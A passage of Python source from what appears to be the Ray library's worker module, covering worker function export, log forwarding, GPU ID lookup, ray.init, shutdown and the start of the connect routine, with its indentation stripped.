then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = ray_constants.LOGGER_LEVEL,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows (substituting
in the appropriate port if needed).
.. code-block:: python
ray.init(address="localhost:6379")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address, _deprecation_warn_enabled=False)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if RAY_JOB_CONFIG_JSON_ENV_VAR in os.environ:
if runtime_env:
logger.warning(
"Both RAY_JOB_CONFIG_JSON_ENV_VAR and ray.init(runtime_env) "
"are provided, only using JSON_ENV_VAR to construct "
"job_config. Please ensure no runtime_env is used in driver "
"script's ray.init() when using job submission API.")
# Set runtime_env in job_config if passed as env variable, such as
# ray job submission with driver script executed in subprocess
job_config_json = json.loads(
os.environ.get(RAY_JOB_CONFIG_JSON_ENV_VAR))
job_config = ray.job_config.JobConfig.from_json(job_config_json)
# RAY_JOB_CONFIG_JSON_ENV_VAR is only set at ray job manager level and has
# higher priority in case user also provided runtime_env for ray.init()
elif runtime_env:
# Set runtime_env in job_config if passed in as part of ray.init()
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# disconnect internal kv
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
_internal_kv_reset()
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
startup_token=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
startup_token (int): The startup token of the process assigned to
it during startup as a command line argument.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
worker.gcs_client = gcs_utils.GcsClient.create_from_redis(
worker.redis_client)
_initialize_internal_kv(worker.gcs_client)
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if (mode == SCRIPT_MODE and not job_config.client_job
and job_config.runtime_env):
scratch_dir: str = worker.node.get_runtime_env_dir_path()
runtime_env = job_config.runtime_env or {}
runtime_env = upload_py_modules_if_needed(
runtime_env, scratch_dir, logger=logger)
runtime_env = upload_working_dir_if_needed(
runtime_env, scratch_dir, logger=logger)
# Remove excludes, it isn't relevant after the upload step.
runtime_env.pop("excludes", None)
job_config.set_runtime_env(runtime_env)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid, startup_token)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
